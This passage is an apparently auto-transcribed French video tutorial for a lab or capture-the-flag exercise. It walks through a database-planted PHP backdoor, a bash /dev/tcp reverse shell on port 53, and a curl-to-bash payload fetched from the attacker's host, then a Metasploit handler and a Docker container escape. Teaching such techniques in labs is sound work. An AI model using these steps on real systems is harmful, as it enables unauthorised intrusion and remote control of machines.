vous le savez. Ok, donc là on a écrit, qu'est-ce qu'on a fait? Bah il nous dit, hein, requête ok. On a quoi? Bah il y a une ligne qui a été affectée. Bah c'est normal, on vient d'injecter. D'accord? Alors, qu'est-ce qu'on a vu maintenant? Bah qu'on peut se barrer. Qu'est-ce qu'on a vu également? Que j'avais un port 80-80. Hein? Et je t'ai dit que c'est quoi? Bah généralement c'est du mandataire, généralement c'est du proxy. Comment je sais ça? Bah je t'ai dit quoi? ZV sur quoi? Sur 192, ma base de données, mon backend, quoi? Sur le port 80-80? Et qu'est-ce qu'il dit? Ah, il dit que c'est ouvert. Ah, est-ce que ça serait pas ça qui permet l'interconnexion et la communication entre quoi? Le conteneur qui gère la base de données qui est hébergée sur l'hôte qui fait tourner le serveur web et les autres conteneurs et l'hôte. Hein? Est-ce que ça serait pas ma porte d'entrée? Est-ce qu'on pourrait pas feinter? Curl 127 0 0 1 80 80 et tu cherches Toto, je sais pas, 1.php et on essaye notre injection. Alors qu'est-ce que j'avais rentré? J'avais rentré Toto comme paramètre et on peut peut-être lui demander, je sais pas, où am I? Ça marche ça? Failed. Losers. Qu'est-ce qu'on peut tenter alors? Directement. Et là, c'est le drame. Pourquoi c'est le drame? Ben parce que ID, ça y est, c'est bon, on a injecté la backdoor. Alors, qu'est-ce qu'on a? Ben, j'ai de l'injection de commande à partir du paramètre qu'on vient injecter dans quoi? Dans la base de données, et on lui a dit redirection vers un fichier qui s'appelle toto.php et je lui ai fait quoi? Bah, je lui ai dit, écoute, on peut maintenant injecter après notre query string, notre Toto. C'est ce qu'on a fait là. D'accord? Ok, donc c'est fonctionnel, la porte dérobée, elle est bonne. Alors, en fait, c'est qui fait tourner la base de données?
c'est www.data. D'accord? Ok. Donc maintenant, il faut qu'on s'échappe de la prison. Il n'y a pas de secret. D'accord? Donc maintenant qu'on a une RCE sur l'autre, on va créer un shell inverse, un reverse shell. On va obtenir un shell stab sur la boîte et on va s'échapper du conteneur. Alors, pour ce faire, qu'est-ce qu'on peut faire? Utiliser du bash, utiliser du netcat, utiliser du Python, utiliser du Perl. En fait, tu utilises ce que tu veux. Comment je sais ça? Eh ben, j'ai deux possibilités. Déjà, j'ai mon ami Hacking Tools. D'accord? Quoi? Reverse Shell? Ok. D'accord? T'as tout ça. T'as tous les langages qui sont là. Et si jamais tu doutes, qu'est-ce que tu peux faire? Je peux pas accéder directement là-dessus. About us, PayPal, Contribute. MSF Venom Builder. Hein, tu peux commencer à crafter un petit reverse. Un petit truc sympa là, tu peux jeter un petit coup d'œil. Sinon, qu'est-ce que tu as? Qu'est-ce que te dit Saltimbanque tout le temps? Va aller voir, payload all the things. C'est ce qu'on va faire. Payload all the things. Comme disent les Anglais. Et on veut quoi? On veut un reverse shell. Voilà. Si tu as des petites questions, voilà tes réponses. Voilà les langages que tu peux exploiter. D'accord? Donc, on est sur du Linux, on va utiliser nous du bash. D'accord? Vous utilisez ce que vous voulez et je vous conseille de faire l'exercice pour vous entraîner. D'accord? Vous entraîner. Alors, qu'est-ce qu'on peut faire? Eh ben, on va utiliser du bash, on va créer un reverse shell et on va encoder en URL pour utiliser pas vraiment de l'offuscation, mais juste pouvoir contourner quoi. On a des caractères, des métacaractères, on a des caractères qui sont interprétés en bash qui sont pas bons. Pourtant, nous, on les utilise souvent. C'est quoi? Vous vous en doutez? C'est quoi? Un point virgule, point d'interrogation, point d'exclamation, l'apostrophe, hein? Le single quote, le quoi? Le percent, l'éperluette, tout ça, c'est pas bon pour nous. D'accord? Donc, on va coder et après, on va encoder. Alors, comment je code? Eh ben, on va coder là. Je peux maintenant aller dans TMP. Nano, il l'a. Enable to create, blablabla. Ok. Et tu peux sauver quand même. Cancel. Ok. Donc il va falloir qu'on le pousse. On va le faire sur notre machine. Sudo exploit.bash sudo nano, hein, peut-être ça marche un peu mieux, il paraît, et on va lui ajouter des lignes, tant qu'à faire. Qu'est-ce qu'on peut lui dire? Shebang. D'accord. Ensuite, ce qu'on a vu, très compliqué. Qu'est-ce qu'on peut faire? Qu'est-ce qui est ouvert tout le temps sur une machine et qui va permettre l'exfiltration, mais qui n'est pas chiffré? Mais là, on fait pas du red teaming, on s'en fout. D'accord? On fait un test d'intrusion. Qu'est-ce que je peux utiliser? Le 53. C'est quoi le 53? C'est le DNS. C'est ce qu'on va faire. Bash. I. T'exécutes tout de suite. Quoi? Redirection. Pourquoi? Parce que tu fais un tube nommé. Un tube nommé, c'est quoi? Eh ben, si tu fais cette direction, c'est-à-dire de quoi? De gauche à droite vers upper send, il faut que tu finisses automatiquement de quoi? De 0 vers 1. C'est quoi? Ça permet la redirection des file descriptors, des flux. Tu te rappelles ce que je t'avais dit? On a quoi? 0, 1, 2 et 3. Alors, 0, c'est quoi? C'est l'input, c'est les entrées, c'est ton clavier. 1, c'est l'écran. 2, c'est les erreurs. Et 3, c'est tout. D'accord? Donc, qu'est-ce que je veux? Je veux rediriger. Quoi? 0, 1. Je veux rediriger tout simplement tout ce qui rentre par l'ordinateur ressort vers moi. Tout ce qui ressort vers moi rentre dans l'ordinateur. C'est-à-dire, on a besoin de gérer quoi? 0 et 1. On a besoin de gérer les entrées clavier et la sortie, le retour. D'accord? Ce que je tape sur mon clavier, c'est exécuté sur l'ordinateur. D'accord? Alors, si tu as des doutes, je vais t'aider. Si tu débutes en bash, tu as le droit. Dev, TCP, je t'en ai parlé. Je te dis qu'on peut s'en servir. Pourquoi?
pour thune 0 IP. Donc ça dit quoi en fait? Ça dit à mon Linux, va dans dev, regarde un petit peu, il y a un truc qui doit s'appeler dev TCP que tu ne peux pas voir. Et dans dev TCP, il y a quoi? Hein, tu vois le T, mais tu ne vois pas le TCP. Dans dev TCP, il y a thune 0. Va voir l'interface thune 0 et tu rediriges vers le port 53. D'accord? Ni plus ni moins. Donc là, il utilise un truc légèrement différent, hein, mais tout ça fonctionnerait, hein, aucun doute là-dessus. Et vous voyez que parfois les redirections sont différentes, d'accord? Et on peut les faire dans les deux sens. Tout va dépendre. Soit tu le mets au début, soit tu le mets à la fin, d'accord? Mais ça, il faut vraiment que vous soyez à l'aise, d'accord? Et tu vois que très souvent, c'est ça. Hein, c'est ce qu'on vient de faire là. Bashi. D'accord? Sauf que moi, j'utilise dev TCP avec mon thune 0. Comme ça, j'ai pas besoin de mettre l'adresse IP. C'est intelligent. J'ai pas besoin de m'emmerder à copier mon adresse IP. D'accord? Donc voilà. Si tu as des doutes, tu prends ça. Tu copies. Tu sauvegardes. Tu sors. Et là, qu'est-ce que tu peux faire? Tu peux aller dans ce que tu veux. Allez, on va prendre ça. Je n'ai plus besoin. On va aller dans Shell Explain. Non, je l'ai pas en mémoire. Bon. Voilà. Et tu creuses. Hein, ça va t'apprendre le bash. Ok. Donc il te dit c'est du bash. Le bash c'est du Born Again Shell. Ensuite, le shell est interactif. C'est-à-dire que tu vas le faire interactivement mais dans la foulée. Quoi? Ça, c'est quoi? Bah, regarde, tu suis. Le bleu, ça te dit quoi? Il est où le bleu? Ah, il est tout ça. Redirection. D'accord. Standard input. Ah, comment je redirige? D'accord. 1, 2. Donc voilà, apprends le bash. Vraiment, t'as plein de cours de bash gratuits. Hein. Et le 0,1, si je descends tout en bas, pareil. Redirection. D'accord? Donc pareil. Allez voir, traduisez-vous ça. Hein. Franchement, si tu galères, tu peux pas me dire ouais, c'est en anglais, je comprends pas. Bah ouais, bah là, ça y est, c'est en français. Ok? Donc voilà, apprends. Ok, donc ça pareil. Si tu connais pas le bash, tu vas te mettre ça en favori, direct. Ok, on est bon, mais qu'est-ce qui se passe? Bah peut-être ça va pas marcher. Pourquoi? Parce que je suis en train d'injecter ça sur un serveur web. Le serveur web, il a du PHP. Et il y a peut-être le navigateur, le côté front-end, il aime quoi? Il aime ce qui est codé en URL. Donc, peut-être que ça ne va pas marcher. Donc, à nous de voir. D'accord? Ok, donc on a notre charge utile prête à l'emploi. On va se l'héberger et on va la pousser. Donc, on va se refaire un petit serveur, exploiter SH, parfait, sudo python. Alors, ce que j'aurais pu faire un chisel aussi. Putain, je voulais vous le montrer, puis je voulais pas montrer du coup. On verra. Le pivot plus tard. On va pas se prendre la tête pour l'instant. On va faire simple. On va aller à l'essentiel. D'accord, il y a déjà... Où c'est qu'il tourne? Ah oui, je sais plus sur fenêtre. Il tourne dans Dipsy, c'est pas bon. C'est des points. Là, c'est bon. Hein, parce que je partage dans le répertoire où je suis. Là, je partage dans mon home-dir. Avant, je partageais dans Dipsy. Donc, je peux pas récupérer un fichier qui est dans mon home-dir si je suis dans Dipsy. C'est pour ça que je fais ça. Donc, du coup, là, je peux tout à fait maintenant faire un curl. Au simple, hein, je veux l'appeler comment? Ex.sh, explora.sh, et je vais aller taper sur 50, 107, 201. Comme c'est pas le port 80, il faut que je le précise, sinon j'en aurai pas besoin. Et je vais lui dire tu récupères exploit.sh. Et j'ai toujours pas mes points, je sais pas pourquoi. Ok, on voit qu'il a fait le get, il a récupéré, on est bon. chmod pour lui donner les droits en exécution sur exploit. Ok, bon, on va le feinter. On va le feinter. Je comprends pas pourquoi ça ne marche pas. Alors, on va curl. On va l'exécuter dans la foulée. HTTP
Donc ma machine 107 201 sur le port 80 tu récupères exploit.sh. Putain mais j'ai pas fumé la moquette là. Ça s'appelle exploit le truc. Ouais. Ok, bon, exploit.sh, c'est pas grave, on va lui faire la nique, on va piper. Voilà, et là tu l'exécutes en bash. Et tu me rends la main. TCP tune, il n'aime pas. Pourquoi ça devrait marcher en principe? Ok. Ok. Sudo nano. Je parlais trop vite. Ça devait marcher. Je sais pas pourquoi. Petite couille dans le pâté. Hein, c'est pas grave. Je vais mettre l'adresse IP codée en dur. 10 50 107.201. Ou c'est peut-être l'encodage en URL en fait. Je suis en train de me réfléchir. Ça doit être ça. Ça doit être ça. Ouais. Bon, de toute façon. MSF console. On va récupérer. Il faut de toute façon que je récupère sur le 53. Donc c'est ce qu'on va faire. On va se prendre un multi-handler. Parce que là, ça sert à rien que je le lance. Si j'ai pas de quoi récupérer l'exploit. Donc qu'est-ce qu'on veut? J'aurais pu faire un netcat LNVP 53. Là, je vais utiliser Metasploit. Vous faites comme vous voulez. Exploit multi-handler. D'accord. Options. Sudo UFW low 53. J'ouvre le DNS entrant chez moi. Ok. Et on va modifier le L port. Donc set L host sur mon tune 0. Ok. Et set L port sur le 53. Oh non. Ouais. Grosse faute de ma part. Pourquoi? C'est un common port. Les common ports sous Linux, il faut quoi? Il faut être root pour pouvoir les utiliser. Donc, pas MS console, sudo MSF console. Gros blaireau. Et ça se dit confirmé. Charlot de l'informatique. Voilà. J'ai fait exprès de faire la faute, comme ça, vous le savez. C'est genre. Donc, on recommence. Hein, il l'a pas pris. Il m'a fait un petit doigt là. Je crois qu'il m'a fait un petit doigt. Ouais, il m'a fait un beau petit doigt. Hein? Qu'est-ce qu'il me fait là? Eh wesh. Je suis pas venu ici pour souffrir. Bon, c'est pas grave. C'est bon? T'es content? Voilà, les bugs, l'informatique exploite. Et là, tu peux exploiter maintenant. Voilà. Parce que c'était un port dit réservé. Et il n'y a que root qui peut utiliser les common ports de 0 à 1024. Que ça soit clair. Okay. So, basically now, what can I do? I can do this. Ouais, mais si tu montes pas le serveur en même temps, ça risque pas de marcher. Espèce de blaireau des îles. Ok. Et ça ne marche pas. Donc, t'as compris pourquoi ça ne marche pas? C'est quoi le problème? Bah, le problème déjà, c'est qu'il faudrait qu'on encode. Ajouter une couche d'offuscation, techniquement, il y a un blême. Qu'est-ce qui se passe? J'ai pas la session. D'accord? Mais est-ce qu'on est vraiment en train de la pousser au bon endroit? Ben en fait, non, pas du tout. Pas du tout. Pourquoi? Parce qu'on n'utilise pas l'injection de commande, la LFI. D'accord? Alors, qu'est-ce que j'entends par là? Je reprends ma commande. Et
cette fois-ci, on va la coder, quoi, en URL. Et vous allez voir que ça permet de bypass. Si tu tapes le bon endroit et que tu encodes, ça devrait le faire. Ok? Donc, nous allons coder ça. Ça, c'est mon curl. Ok. Là, jusque-là, je comprends. Pas de problème. Mais ça, c'est pas directement sur le serveur. Pourquoi on s'est emmerdé à injecter la porte dérobée dans la base de données? Parce qu'on a maintenant notre point de terminaison faillible. C'est quoi notre point de terminaison? C'est Toto, notre paramètre. D'accord? Et c'est là-dessus qu'il faut injecter. Donc ça veut dire quoi pour nous? Ça va pas marcher. On l'a bien compris. Donc qu'est-ce que je veux en fait? La commande exacte, que vous compreniez bien. Bien sûr, je vais récupérer, mais avant quoi? Avant de curler ça, c'est quoi en fait? C'est... Qu'est-ce qu'on a fait? Qu'est-ce qu'on a fait tout à l'heure? On faisait quoi? Où am I? D'accord? Eh ben c'est exactement ça. Donc qu'est-ce que je veux faire? Toto? Ouais. Ça? D'accord, j'injecte le payload là-dedans. Et c'est là que ça risque de marcher. Ou pas. Je referme parce que j'avais ouvert au début. Non. Ça récupère. Ça pousse. Et là, c'est opérationnel. D'accord? Encodage en URL pour que ça soit bien effectif, pour que mes fameux caractères ne soient pas tronqués, que la data soit bien traitée, parsed, hein, et ensuite, pourquoi le point de terminaison Toto, le paramètre qu'on a injecté en base de données? Tout simplement parce que c'est ça qui va me permettre de quoi? Mais ça y est, les amis, c'est quoi? On est passé www.data. Et tu vois bien quoi? IP 200-133. Qu'est-ce qu'on vient de faire? On vient de s'échapper, ça y est. Ça y est, on est en dehors de la prison. On a bypass ce putain de conteneur. D'accord? Et voilà. Et je retrouve quoi? Oh, incroyable. Tu comprends pourquoi je les voyais pas? Qu'est-ce qu'on a fait grâce à la base de données? On a écrit dans un endroit qu'on ne pouvait pas. Oh, ah, je comprends mieux. Tu comprends ou pas? Non, mais ça, c'est vraiment n'importe quoi. Faut que tu comprennes, c'est grâce à la bonne base de données qu'on a fait tout ça. C'est grâce à la base de données. Parce que sans elle... Pourquoi tout à l'heure, je t'ai montré. J'ai fait exprès, en fait. Non, là, pour le coup, je l'ai vraiment fait exprès. Qu'est-ce que j'ai fait? J'ai fait un ls pour essayer de te montrer dans var. Je sais pas si je peux te le remontrer. Déjà, regarde bien ce que je te disais dans les précédentes vidéos. Ok, on est toujours www.data. Mais maintenant, là, c'est le conteneur. Et là, c'est notre serveur, notre route. On vient de s'échapper. Ça a l'air exactement identique, mais ça l'est pas. ls, toi, t'as que index dans le conteneur, alors qu'en vérité, il y a quoi? Il y a plein d'autres choses. Toi, tu vois que l'index HTML qui est dans le conteneur. Tu vois que l'index HTML sur la machine physique, il est même pas présent. Et nous, on a quoi? C'est là. Tu sais, je te dis, ah, Toto 1, je comprends pas. Mais c'est parce que je l'avais déjà fait dans le précédent exercice. Et j'en avais même poussé un autre. Hein, pour comprendre qu'en fait, bah, c'était pas là-dedans. Je le voyais pas. Je peux pas le voir parce qu'il est là-dedans. Et c'est ça qui fait toute la différence. Pourquoi on arrive à s'échapper? Parce qu'on arrive à écrire en dehors du conteneur et c'est la RCE qui est exécutée en tant que quoi? www.data en dehors du conteneur qui nous permet de nous échapper du Docker. D'accord? Donc ça, j'espère que c'est vraiment clair pour vous. Maintenant, on peut quoi? Ben, on peut taper un autre flag. D'accord?